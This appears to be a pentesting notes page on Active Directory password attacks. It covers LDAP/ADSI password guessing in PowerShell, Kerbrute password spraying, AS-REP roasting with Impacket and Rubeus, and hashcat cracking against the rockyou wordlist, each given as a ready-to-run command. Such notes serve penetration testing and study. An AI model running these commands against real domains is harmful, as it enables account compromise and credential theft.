Password Guessing

Basic Powershell Script

This method is a slow and low password guessing attempt using powershell script that uses LDAP and ADSI. In the following powershell script we are trying to use the DirectoryEntry constructor with a different username and password. This creates a directory entry in the context of the mentioned user and if found successful, then the object is created and we can conclude that the password is correct.

$domainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObject.PdcRoleOwner).Name
$SearchURL = "LDAP://"
$SearchURL += $PDC + "/"
$UniqueName = "DC=$($domainObject.Name.Replace('.', ',DC='))"
$SearchURL += $UniqueName
New-Object System.DirectoryServices.DirectoryEntry($SearchURL, "username", "password!")

Crackmapexec

Crackmapexec tool can be used to access the SMB service using the username and password.

Using Crackmapexec

Obtaining a TGT

In this method we can attempt to get a TGT from the Domain Controller using a username and password. Kerbrute is one of the tools that can be used for password guessing using this method. The syntax to the command is as follows,

.\kerbrute_windows_amd64.exe passwordspray -d p42.com .\usernames.txt "password!"

AS-Rep Roasting

As part of obtaining a TGT the username and password has to be presented to the domain controller and this is called preauthentication. Sometimes preauthentication is disabled and any user can send a AS-Req on another user's behalf and get an AS-Rep. Once obtained this can be used to guess the password offline.

Using Impacket

Impactet can be used for performing this attack using the following command,

impacket-GetNPUsers -dc-ip 192.168.1.2 -request -outputfile hash.asreproast p42.com/username

This should fetch the AS-Rep hash that can be cracked using hashcat using the following command,

sudo hashcat -m 18200 hash.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Using Rubeus

Rubeus is a Windows tool that can be used to perform the same attack. This tool identifies from the list of users that is vulnerable to this attack and then performs it. The output of the tool displays the hash of the user. The hash can then be used to guess the password using hashcat as above.

.\Rubeus.exe asreproast /nowrap

In a given domain the users that do not require preauthentication can be identified by using PowerView.ps1's function "Get-DomainUser" with the option "-PreauthNotRequired".

PreviousAD Authentication AttacksNextCreating & Cracking TGS

Last updated